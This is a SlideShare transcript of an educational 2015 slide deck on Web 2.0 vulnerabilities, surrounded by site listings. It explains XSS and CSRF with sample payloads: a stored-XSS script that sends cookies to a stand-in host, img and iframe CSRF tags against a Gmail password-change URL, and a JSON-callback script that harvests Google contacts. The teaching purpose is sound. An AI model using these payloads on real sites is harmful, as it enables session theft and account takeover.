SlideShare una empresa de Scribd logo

Web 2.0 PPT

Descargar como PPTX, PDF
yogendra singh chahar
yogendra singh chahar
1 de 20
11-02-20151 Vulnerabilities in Web 2.0 By Presentation on YOG ENDRA SING H CHA HA R
11-02-20152 Web 2.0 is an industry buzz word that gets thrown around quite often. The term is often used for new web technology or comparison between products/services that extend from the initial web era to the existing one. “Web 2.0 is the business revolution in the computer industry caused by the move to the internet as a platform, and an attempt to understand the rules for success on that new platform. Chief among those rules is this: Build applications that harness network effects to get better the more people use them” What is Web 2.0 ?
11-02-20153
11-02-20154 Key points about Web 2.0 User Generated contents Architecture of participation 1. Soc Nets 2. YouTube Desktop Look and Feels Syndication of Contents Offline Storage of Data and State Everything can go online now 1. Google Docs 2. eyeOS Rapid proliferation of content 1. RSS 2. Atom Writes data to local databases 1. Gears 2. HTML 5
11-02-20155 Differences Between Web 1.0 and 2.0 CATEGORY WEB 1.0 WEB 2.0 Functionality/Contents Reading Contents Creating Contents Personal Websites Blogs & Profiles BETAUnder Construction Sign Technologies HTML, HTTP, HTTPS AJAX, JSON, SOAP, REST, XML, HTTP, HTTPS Synchronous Asynchronous Client-Server Peer to Peer Security Content from site owner Content from site user Distributed, multiple entry points Structured entry points
11-02-20156 Common Web 2.0 Vulnerabilities 1. Cross Site Scripting 2. Cross Site Request Forgery 3. SQL Injection 4. Authentication and Authorization Flaws 5. Information Leakage 6. Insecure Storage 7. Insecure Communications
11-02-20157 • On top of that list we do have some specific Web 2.0 vulnerabilities: 1. XSS Worms 2. Feed Injections 3. Mashup and Widget Hacks Some Web 2.0 Specific Vulnerabilities
11-02-20158 Cross Site Scripting (XSS) • New to Web 2.0? No • Is this worse in Web 2.0? Yes XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content.
11-02-20159 Cross Site Scripting (XSS) • Non-Persistent “Reflected” • Input is immediately used in the page returned to the user • Think: <script>alert(document.cookie)</script> •Persistent “Stored” • The malicious input is stored server side (message boards etc) and used in many users pages • Think: <SCRIPT> document.location='http://examplesite.com/cgibin/cookiemonster.cgi?'+document.cookie </SCRIPT> • DOM Based • Content inserted into the user pages DOM, all client side because data is never sent to the server • Think: http://examplesite.com/home.php?name=<script>……….. • Coupled with: <SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT>
11-02-201510 Cross Site Scripting (XSS) What makes this worse in Web 2.0? • Dynamic nature of the DOM in Web 2.0 apps • User controlled data in more places • Self propagating XSS attack code • Stream (i.e. JSON, XML etc) contents may be malicious
11-02-201511 Cross Site Scripting (XSS) • Dynamic nature of DOM in AJAX and RIA applications utilizes JavaScript calls such as document.write which can write malicious data to the DOM • If you use document.write(data) with the data coming from an untrusted source then data such as: <script>alert(document.cookie)</script> can be injected into the DOM • Malicious input in streams such as JSON written to the DOM by the javascript eval()
11-02-201512 Cross Site Scripting (XSS) function date() { var http; if(window.XMLHttpRequest) { http = new XMLHttpRequest(); } else if (window.ActiveXObject) { http=new ActiveXObject("Msxml2.XMLHTTP"); if (! http) { http=new ActiveXObject("Microsoft.XMLHTTP"); } } http.open("GET", ”siteproxy.php?url=http://livedate-example.com", true); http.onreadystatechange = function() { if (http.readyState == 4) { var response = http.responseText; //other code in here eval(data) } } http.send(null); }
11-02-201513 Cross Site Request Forgery (CSRF) • New to Web 2.0? No • Is this worse in Web 2.0? Yes Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim’s browser to perform a hostile action to the benefit of the attacker. XSS != CSRF XSS, malicious script is executed on the client’s browser, whereas in CSRF, a malicious command or event is executed against an already trusted site.
11-02-201514 POST http://ninjarental.com/login.html HTTP/1.1 HTTP headers etc in here user=ninjafan&pass=Ninjafan1&Submit=Submit Cross Site Request Forgery (CSRF)
11-02-201515 Cross Site Request Forgery (CSRF) GET http://ninjarental.com/purchase?ninja=rgninja&Submit=Submit.html HTTP/1.1 HTTP headers etc in here SessionID=0123456789
11-02-201516 <IMG SRC=“http://ninjarental.com/purchase.html?ninja=cnninja” />HTTP/1.1 HTTP headers etc in here SessionID=0123456789 Cross Site Request Forgery (CSRF)
11-02-201517 What makes this worse in Web 2.0? • XML and JSON based attacks tricky but possible • Web 2.0 has to allow cross domain access • Same Origin Policy doesn't protect you Cross Site Request Forgery (CSRF)
11-02-201518 Cross Site Request Forgery (CSRF) • Discovered by Vicente Aguilera Diaz • <IMG SRC… and <IFRAME SRC… used to exploit it <img src="https://www.google.com/accounts/UpdatePasswd service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1 &Passwd=abc123&PasswdAgain=abc123&p=&save=Save"> <iframe src="https://www.google.com/accounts/UpdatePasswd service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1 &Passwd=abc123&PasswdAgain=abc123&p=&save=Save"> GMAIL change password CSRF vulnerability
11-02-201519 Google contacts CSRF with JSON • Normally XMLHttpRequest (XHR) pulls in data from same domain location • JSON data cannot be called from an off domain source • That’s not very Web 2.0 friendly though is it? • JSON call-backs to the rescue! Cross Site Request Forgery (CSRF)
11-02-201520 <script type="text/javascript"> function google(data){ var emails, i; for (i = 0; i < data.Body.Contacts.length; i++) { mails += "<li>" + data.Body.Contacts[i].Email + "</li>"; } document.write("<ol>" + emails + "</ol>"); } </script> <script type="text/javascript" src="http://docs.google.com/data/contacts? out=js&show=ALL&psort=Affinity&callback=google&max=99999"> </script> Cross Site Request Forgery (CSRF)

Recomendados

web 2.0
web 2.0web 2.0
web 2.0Roche Labtang
 
Web 1.0 and Web 2.0
Web 1.0 and Web 2.0Web 1.0 and Web 2.0
Web 1.0 and Web 2.0Caroline Cerveny
 
Ten Characteristics Of Web 2.0
Ten Characteristics Of Web 2.0Ten Characteristics Of Web 2.0
Ten Characteristics Of Web 2.0Vito Di Bari
 
Web2 0 Ppt
Web2 0 PptWeb2 0 Ppt
Web2 0 Pptsurenth
 
Web2.0
Web2.0Web2.0
Web2.0John Tian
 
Web 2.0
Web 2.0Web 2.0
Web 2.0venki21
 
Web 2.0 modificada
Web 2.0 modificadaWeb 2.0 modificada
Web 2.0 modificadalucriman
 
Web 2.0
Web 2.0Web 2.0
Web 2.0Satyajeet Singh
 

Recomendados

web 2.0
web 2.0web 2.0
web 2.0Roche Labtang
 
Web 1.0 and Web 2.0
Web 1.0 and Web 2.0Web 1.0 and Web 2.0
Web 1.0 and Web 2.0Caroline Cerveny
 
Ten Characteristics Of Web 2.0
Ten Characteristics Of Web 2.0Ten Characteristics Of Web 2.0
Ten Characteristics Of Web 2.0Vito Di Bari
 
Web2 0 Ppt
Web2 0 PptWeb2 0 Ppt
Web2 0 Pptsurenth
 
Web2.0
Web2.0Web2.0
Web2.0John Tian
 
Web 2.0
Web 2.0Web 2.0
Web 2.0venki21
 
Web 2.0 modificada
Web 2.0 modificadaWeb 2.0 modificada
Web 2.0 modificadalucriman
 
Web 2.0
Web 2.0Web 2.0
Web 2.0Satyajeet Singh
 
Principles of web 2.0
Principles of web 2.0Principles of web 2.0
Principles of web 2.0Aron Goldstein
 
Web 20 From Linked In 3 05 09
Web 20 From Linked In 3 05 09Web 20 From Linked In 3 05 09
Web 20 From Linked In 3 05 09delahunt98
 
Web 2.0 Slideshare
Web 2.0 SlideshareWeb 2.0 Slideshare
Web 2.0 SlidesharePeetey007
 
Web 20-
Web 20-Web 20-
Web 20-Nestor
 
Web 2.0
Web 2.0Web 2.0
Web 2.051 lecture
 
WEB 2.0 VS WEB 1.0
WEB 2.0 VS WEB 1.0WEB 2.0 VS WEB 1.0
WEB 2.0 VS WEB 1.0guest4e02e9
 
My ppts
My pptsMy ppts
My pptsrachana
 
Web 2.0
Web 2.0Web 2.0
Web 2.0Augusto Seixas
 
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheq
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheqAq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheq
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheqevaristo
 
Web 1.0 vs web 2.0
Web 1.0 vs web 2.0Web 1.0 vs web 2.0
Web 1.0 vs web 2.0Tricia Slechta
 
Web2.0 Ppt
Web2.0 PptWeb2.0 Ppt
Web2.0 PptPark.C.H
 
Web 2.0: characteristics and tools (2010 eng)
Web 2.0: characteristics and tools (2010 eng)Web 2.0: characteristics and tools (2010 eng)
Web 2.0: characteristics and tools (2010 eng)Carlo Vaccari
 
Web development: Why do we need it ?
Web development: Why do we need it ?Web development: Why do we need it ?
Web development: Why do we need it ?anubhavdoodleblue123
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Bp101-Can Domino Be Hacked
Bp101-Can Domino Be HackedBp101-Can Domino Be Hacked
Bp101-Can Domino Be HackedHoward Greenberg
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101Sasha Nunke
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
4163A - What is Web 2.0.ppt
4163A - What is Web 2.0.ppt4163A - What is Web 2.0.ppt
4163A - What is Web 2.0.pptMatthew Perrins
 
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital Marketers
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital MarketersSearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital Marketers
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital MarketersDistilled
 
Progressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoProgressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoDEVCON
 
Web application & proxy server
Web application & proxy serverWeb application & proxy server
Web application & proxy serverMeera Hapaliya
 
WebSockets: The Current State of the Most Valuable HTML5 API for Java Developers
WebSockets: The Current State of the Most Valuable HTML5 API for Java DevelopersWebSockets: The Current State of the Most Valuable HTML5 API for Java Developers
WebSockets: The Current State of the Most Valuable HTML5 API for Java DevelopersViktor Gamov
 

Más contenido relacionado

La actualidad más candente

Web 20 From Linked In 3 05 09
Web 20 From Linked In 3 05 09Web 20 From Linked In 3 05 09
Web 20 From Linked In 3 05 09delahunt98
 
Web 2.0 Slideshare
Web 2.0 SlideshareWeb 2.0 Slideshare
Web 2.0 SlidesharePeetey007
 
WEB 2.0 VS WEB 1.0
WEB 2.0 VS WEB 1.0WEB 2.0 VS WEB 1.0
WEB 2.0 VS WEB 1.0guest4e02e9
 
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheq
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheqAq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheq
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheqevaristo
 
Web2.0 Ppt
Web2.0 PptWeb2.0 Ppt
Web2.0 PptPark.C.H
 
Web 2.0: characteristics and tools (2010 eng)
Web 2.0: characteristics and tools (2010 eng)Web 2.0: characteristics and tools (2010 eng)
Web 2.0: characteristics and tools (2010 eng)Carlo Vaccari
 

La actualidad más candente (12)

Principles of web 2.0
Principles of web 2.0Principles of web 2.0
Principles of web 2.0
 
Web 20 From Linked In 3 05 09
Web 20 From Linked In 3 05 09Web 20 From Linked In 3 05 09
Web 20 From Linked In 3 05 09
 
Web 2.0 Slideshare
Web 2.0 SlideshareWeb 2.0 Slideshare
Web 2.0 Slideshare
 
Web 20-
Web 20-Web 20-
Web 20-
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
WEB 2.0 VS WEB 1.0
WEB 2.0 VS WEB 1.0WEB 2.0 VS WEB 1.0
WEB 2.0 VS WEB 1.0
 
My ppts
My pptsMy ppts
My ppts
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheq
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheqAq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheq
Aq4w8jb7v9 ialyvre=&expires=1282751370&aws accesskeyid=akiajljt267degkzdheq
 
Web 1.0 vs web 2.0
Web 1.0 vs web 2.0Web 1.0 vs web 2.0
Web 1.0 vs web 2.0
 
Web2.0 Ppt
Web2.0 PptWeb2.0 Ppt
Web2.0 Ppt
 
Web 2.0: characteristics and tools (2010 eng)
Web 2.0: characteristics and tools (2010 eng)Web 2.0: characteristics and tools (2010 eng)
Web 2.0: characteristics and tools (2010 eng)
 

Similar a Web 2.0 PPT

Web development: Why do we need it ?
Web development: Why do we need it ?Web development: Why do we need it ?
Web development: Why do we need it ?anubhavdoodleblue123
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Bp101-Can Domino Be Hacked
Bp101-Can Domino Be HackedBp101-Can Domino Be Hacked
Bp101-Can Domino Be HackedHoward Greenberg
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101Sasha Nunke
 
4163A - What is Web 2.0.ppt
4163A - What is Web 2.0.ppt4163A - What is Web 2.0.ppt
4163A - What is Web 2.0.pptMatthew Perrins
 
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital Marketers
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital MarketersSearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital Marketers
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital MarketersDistilled
 
Progressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoProgressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoDEVCON
 
Web application & proxy server
Web application & proxy serverWeb application & proxy server
Web application & proxy serverMeera Hapaliya
 
WebSockets: The Current State of the Most Valuable HTML5 API for Java Developers
WebSockets: The Current State of the Most Valuable HTML5 API for Java DevelopersWebSockets: The Current State of the Most Valuable HTML5 API for Java Developers
WebSockets: The Current State of the Most Valuable HTML5 API for Java DevelopersViktor Gamov
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
Progressive Web Apps for Education
Progressive Web Apps for EducationProgressive Web Apps for Education
Progressive Web Apps for EducationChris Love
 
SharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning ModelsSharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning ModelsShailen Sukul
 
Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers
Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers
Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers Authoritas
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Proxy Caches and Web Application Security
Proxy Caches and Web Application Security Proxy Caches and Web Application Security
Proxy Caches and Web Application Security Tim Bass
 
Brocade AWS user group Sydney presentation
Brocade AWS user group Sydney presentationBrocade AWS user group Sydney presentation
Brocade AWS user group Sydney presentationPolarSeven Pty Ltd
 
8 Mobile Terms You Need to Know for 2015
8 Mobile Terms You Need to Know for 20158 Mobile Terms You Need to Know for 2015
8 Mobile Terms You Need to Know for 2015Moovweb
 

Similar a Web 2.0 PPT (20)

Web development: Why do we need it ?
Web development: Why do we need it ?Web development: Why do we need it ?
Web development: Why do we need it ?
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Bp101-Can Domino Be Hacked
Bp101-Can Domino Be HackedBp101-Can Domino Be Hacked
Bp101-Can Domino Be Hacked
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
4163A - What is Web 2.0.ppt
4163A - What is Web 2.0.ppt4163A - What is Web 2.0.ppt
4163A - What is Web 2.0.ppt
 
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital Marketers
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital MarketersSearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital Marketers
SearchLove San Diego 2018 | Mat Clayton | Site Speed for Digital Marketers
 
Progressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoProgressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent Convento
 
Web application & proxy server
Web application & proxy serverWeb application & proxy server
Web application & proxy server
 
WebSockets: The Current State of the Most Valuable HTML5 API for Java Developers
WebSockets: The Current State of the Most Valuable HTML5 API for Java DevelopersWebSockets: The Current State of the Most Valuable HTML5 API for Java Developers
WebSockets: The Current State of the Most Valuable HTML5 API for Java Developers
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Progressive Web Apps for Education
Progressive Web Apps for EducationProgressive Web Apps for Education
Progressive Web Apps for Education
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
SharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning ModelsSharePoint 2013 App Provisioning Models
SharePoint 2013 App Provisioning Models
 
Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers
Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers
Tom Bennet – BrightonSEO April 2016: Site Speed for content Marketers
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Proxy Caches and Web Application Security
Proxy Caches and Web Application Security Proxy Caches and Web Application Security
Proxy Caches and Web Application Security
 
Web Security
Web SecurityWeb Security
Web Security
 
Brocade AWS user group Sydney presentation
Brocade AWS user group Sydney presentationBrocade AWS user group Sydney presentation
Brocade AWS user group Sydney presentation
 
8 Mobile Terms You Need to Know for 2015
8 Mobile Terms You Need to Know for 20158 Mobile Terms You Need to Know for 2015
8 Mobile Terms You Need to Know for 2015
 

Web 2.0 PPT

  • 1. 11-02-20151 Vulnerabilities in Web 2.0 By Presentation on YOG ENDRA SING H CHA HA R
  • 2. 11-02-20152 Web 2.0 is an industry buzz word that gets thrown around quite often. The term is often used for new web technology or comparison between products/services that extend from the initial web era to the existing one. “Web 2.0 is the business revolution in the computer industry caused by the move to the internet as a platform, and an attempt to understand the rules for success on that new platform. Chief among those rules is this: Build applications that harness network effects to get better the more people use them” What is Web 2.0 ?
  • 4. 11-02-20154 Key points about Web 2.0 User Generated contents Architecture of participation 1. Soc Nets 2. YouTube Desktop Look and Feels Syndication of Contents Offline Storage of Data and State Everything can go online now 1. Google Docs 2. eyeOS Rapid proliferation of content 1. RSS 2. Atom Writes data to local databases 1. Gears 2. HTML 5
  • 5. 11-02-20155 Differences Between Web 1.0 and 2.0 CATEGORY WEB 1.0 WEB 2.0 Functionality/Contents Reading Contents Creating Contents Personal Websites Blogs & Profiles BETAUnder Construction Sign Technologies HTML, HTTP, HTTPS AJAX, JSON, SOAP, REST, XML, HTTP, HTTPS Synchronous Asynchronous Client-Server Peer to Peer Security Content from site owner Content from site user Distributed, multiple entry points Structured entry points
  • 6. 11-02-20156 Common Web 2.0 Vulnerabilities 1. Cross Site Scripting 2. Cross Site Request Forgery 3. SQL Injection 4. Authentication and Authorization Flaws 5. Information Leakage 6. Insecure Storage 7. Insecure Communications
  • 7. 11-02-20157 • On top of that list we do have some specific Web 2.0 vulnerabilities: 1. XSS Worms 2. Feed Injections 3. Mashup and Widget Hacks Some Web 2.0 Specific Vulnerabilities
  • 8. 11-02-20158 Cross Site Scripting (XSS) • New to Web 2.0? No • Is this worse in Web 2.0? Yes XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content.
  • 9. 11-02-20159 Cross Site Scripting (XSS) • Non-Persistent “Reflected” • Input is immediately used in the page returned to the user • Think: <script>alert(document.cookie)</script> •Persistent “Stored” • The malicious input is stored server side (message boards etc) and used in many users pages • Think: <SCRIPT> document.location='http://examplesite.com/cgibin/cookiemonster.cgi?'+document.cookie </SCRIPT> • DOM Based • Content inserted into the user pages DOM, all client side because data is never sent to the server • Think: http://examplesite.com/home.php?name=<script>……….. • Coupled with: <SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT>
  • 10. 11-02-201510 Cross Site Scripting (XSS) What makes this worse in Web 2.0? • Dynamic nature of the DOM in Web 2.0 apps • User controlled data in more places • Self propagating XSS attack code • Stream (i.e. JSON, XML etc) contents may be malicious
  • 11. 11-02-201511 Cross Site Scripting (XSS) • Dynamic nature of DOM in AJAX and RIA applications utilizes JavaScript calls such as document.write which can write malicious data to the DOM • If you use document.write(data) with the data coming from an untrusted source then data such as: <script>alert(document.cookie)</script> can be injected into the DOM • Malicious input in streams such as JSON written to the DOM by the javascript eval()
  • 12. 11-02-201512 Cross Site Scripting (XSS) function date() { var http; if(window.XMLHttpRequest) { http = new XMLHttpRequest(); } else if (window.ActiveXObject) { http=new ActiveXObject("Msxml2.XMLHTTP"); if (! http) { http=new ActiveXObject("Microsoft.XMLHTTP"); } } http.open("GET", ”siteproxy.php?url=http://livedate-example.com", true); http.onreadystatechange = function() { if (http.readyState == 4) { var response = http.responseText; //other code in here eval(data) } } http.send(null); }
  • 13. 11-02-201513 Cross Site Request Forgery (CSRF) • New to Web 2.0? No • Is this worse in Web 2.0? Yes Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim’s browser to perform a hostile action to the benefit of the attacker. XSS != CSRF XSS, malicious script is executed on the client’s browser, whereas in CSRF, a malicious command or event is executed against an already trusted site.
  • 14. 11-02-201514 POST http://ninjarental.com/login.html HTTP/1.1 HTTP headers etc in here user=ninjafan&pass=Ninjafan1&Submit=Submit Cross Site Request Forgery (CSRF)
  • 15. 11-02-201515 Cross Site Request Forgery (CSRF) GET http://ninjarental.com/purchase?ninja=rgninja&Submit=Submit.html HTTP/1.1 HTTP headers etc in here SessionID=0123456789
  • 16. 11-02-201516 <IMG SRC=“http://ninjarental.com/purchase.html?ninja=cnninja” />HTTP/1.1 HTTP headers etc in here SessionID=0123456789 Cross Site Request Forgery (CSRF)
  • 17. 11-02-201517 What makes this worse in Web 2.0? • XML and JSON based attacks tricky but possible • Web 2.0 has to allow cross domain access • Same Origin Policy doesn't protect you Cross Site Request Forgery (CSRF)
  • 18. 11-02-201518 Cross Site Request Forgery (CSRF) • Discovered by Vicente Aguilera Diaz • <IMG SRC… and <IFRAME SRC… used to exploit it <img src="https://www.google.com/accounts/UpdatePasswd service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1 &Passwd=abc123&PasswdAgain=abc123&p=&save=Save"> <iframe src="https://www.google.com/accounts/UpdatePasswd service=mail&hl=en&group1=OldPasswd&OldPasswd=PASSWORD1 &Passwd=abc123&PasswdAgain=abc123&p=&save=Save"> GMAIL change password CSRF vulnerability
  • 19. 11-02-201519 Google contacts CSRF with JSON • Normally XMLHttpRequest (XHR) pulls in data from same domain location • JSON data cannot be called from an off domain source • That’s not very Web 2.0 friendly though is it? • JSON call-backs to the rescue! Cross Site Request Forgery (CSRF)
  • 20. 11-02-201520 <script type="text/javascript"> function google(data){ var emails, i; for (i = 0; i < data.Body.Contacts.length; i++) { mails += "<li>" + data.Body.Contacts[i].Email + "</li>"; } document.write("<ol>" + emails + "</ol>"); } </script> <script type="text/javascript" src="http://docs.google.com/data/contacts? out=js&show=ALL&psort=Affinity&callback=google&max=99999"> </script> Cross Site Request Forgery (CSRF)